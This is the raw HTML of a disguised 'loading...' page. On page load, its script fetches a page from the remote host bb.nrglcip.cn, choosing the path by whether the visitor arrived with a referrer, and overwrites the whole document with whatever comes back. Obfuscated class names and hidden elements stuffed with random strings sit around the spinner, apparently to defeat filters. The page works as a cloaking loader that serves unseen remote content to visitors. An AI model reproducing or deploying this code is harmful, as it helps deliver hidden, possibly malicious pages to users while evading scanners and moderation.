<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .u16revmOD {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .u16revmOD .OljGHhyf6d {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .u16revmOD .content {
            line-height: 50px;
            text-align: center
        }

        .u16revmOD .img {
            width: 100%
        }

        .u16revmOD .OQebi6DO {
            text-align: center
        }

        .u16revmOD .OQebi6DO span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .u16revmOD .OQebi6DO span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .u16revmOD .OQebi6DO span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .u16revmOD .OQebi6DO span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .u16revmOD .OQebi6DO span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .u16revmOD .OQebi6DO span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .u16revmOD .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function pQ0Wlr7V9jj(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var wVyAWH = pQ0Wlr7V9jj('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ wVyAWH +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ wVyAWH +".html?a=share";
		}
		
        Crg56pV=url+"#"+new Date().getTime();
        Crg56pV && function() {
            $.get(Crg56pV, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<div style='display:none'>PfaY4I9ANrj</div>
<b style='display:none' >i3GjXAfgLzZM005bQYqzhZgez4EZRwGbU9HBZPh5H4mcINiD</b>
<p  style='display:none'>hB2fZFH3v57JgbHrGoyopBTE5E</p>
<li style='display:none' >MSuJwywRpUk8ZvV1NRYohQhb9w1RzcFGaawQp12</li>
<div style='display:none'>PfaY4I9ANrj</div>
<b style='display:none' >i3GjXAfgLzZM005bQYqzhZgez4EZRwGbU9HBZPh5H4mcINiD</b><div class="u16revmOD">
    <div class="OljGHhyf6d">
        <div class="OQebi6DO">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>AAKX4KnlDIevcHwJyE2RLVLWOVt8F5Iq2PulGjsGE9ApMXTsHSXA4p14gpCZ7YRilhGj1pYt2</a>
<h1 style='display:none' >sMUPkTQ67nZUofHhoFGh0zslTIIRyZRyo2cs3V9RgaR6YOxDCSyiwPPJbdJUVHEKGErgKnKqEWJMXibt7pIwIuZeEe</h1>
<a  href='#' style='display:none'>AAKX4KnlDIevcHwJyE2RLVLWOVt8F5Iq2PulGjsGE9ApMXTsHSXA4p14gpCZ7YRilhGj1pYt2</a>
<a  href='#' style='display:none'>AAKX4KnlDIevcHwJyE2RLVLWOVt8F5Iq2PulGjsGE9ApMXTsHSXA4p14gpCZ7YRilhGj1pYt2</a></body>
</html>